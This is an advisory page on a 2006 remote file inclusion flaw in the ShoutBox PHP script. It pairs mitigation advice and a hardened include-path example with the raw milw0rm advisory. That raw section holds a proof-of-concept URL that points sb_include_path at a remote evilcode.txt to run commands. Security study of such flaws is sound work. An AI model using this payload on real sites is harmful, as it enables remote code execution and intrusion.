Vendor: ShoutBox
By: Unknown
CVSS: 7.5 (HIGH)
CWE: Remote Command Execution
Product Name: ShoutBox
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

ShoutBox Remote Command Execution

The vulnerability allows an attacker to execute arbitrary commands on the target system remotely through the ShoutBox script. By manipulating the 'sb_include_path' parameter, an attacker can include a malicious file that contains the command to be executed. This can lead to unauthorized access, data theft, and other malicious activities.

Mitigation:

The vendor should release a patch or update for the ShoutBox script to fix this vulnerability. In the meantime, users are advised to restrict access to the script and implement proper input validation and sanitization to prevent remote command execution.
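As an added example (not part of the original advisory or of the ShoutBox code), the following shows how the define('SB_INCLUDE_PATH', $sb_include_path) line quoted in the raw advisory below can be hardened: the include root is anchored to the script's own directory, and any configured subdirectory is accepted only if it is a local directory inside that tree, so a URL such as the one in the proof of concept is refused before any include runs. The helper sb_resolve_include_path() and the handling of $sb_include_path as a config-file value are assumptions for illustration; the vulnerable original relies on that variable being populated from the HTTP request (register_globals).

```php
<?php
// Added example, not the ShoutBox project's own code.
// Goal: never let an include prefix be chosen by a value an HTTP request
// can populate, and never let it be a stream wrapper (http://, ftp://, ...).

// Constructed helper: accept $candidate only as a subdirectory of $base_dir.
// Returns the normalised directory with a trailing separator, or null to reject.
function sb_resolve_include_path(string $candidate, string $base_dir): ?string
{
    // Reject anything that looks like a URL or stream wrapper outright:
    // a remote prefix is exactly what turns include into code execution.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return null;
    }
    $base = realpath($base_dir);
    // Resolve relative to the install dir; realpath() collapses "../" and
    // returns false for non-existent paths, so traversal is caught below.
    $resolved = realpath($base_dir . DIRECTORY_SEPARATOR . $candidate);
    if ($base === false || $resolved === false || !is_dir($resolved)) {
        return null;
    }
    if ($resolved !== $base
        && strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return rtrim($resolved, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
}

// Install directory derived from this file, not from any variable.
$install_dir = dirname(__FILE__) . DIRECTORY_SEPARATOR;

// Hypothetical: $sb_include_path may be set by a local config file only.
// Whatever its origin, it is validated before use rather than trusted.
$candidate  = isset($sb_include_path) ? (string) $sb_include_path : '';
$validated  = ($candidate === '')
    ? $install_dir
    : sb_resolve_include_path($candidate, $install_dir);

if ($validated === null) {
    // Fail closed: a URL or a path outside the install tree was supplied.
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid include path');
}

define('SB_INCLUDE_PATH', $validated);
include SB_INCLUDE_PATH . 'inc/config.inc.php';
```

On PHP builds where remote includes are still possible, setting allow_url_include=Off (and allow_url_fopen=Off where feasible) in php.ini is a defence-in-depth complement to the validation above.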

Exploit-DB raw data:

>>> Kurdish Security

>>> ShoutBox Remote Command Execution

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Risk : High

>>> Class : Remote

>>> Script : ShoutBox

>>> Site : http://www.knusperleicht.at

Code :


//**********************************************************
//  INCLUDE PATH
define('SB_INCLUDE_PATH', $sb_include_path);
//  INCLUDE PATH
//**********************************************************

include SB_INCLUDE_PATH.'inc/config.inc.php';
require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php';
require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
if(SB_INCLUDE_PATH == "")  {


http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt?&cmd=id

# milw0rm.com [2006-08-01]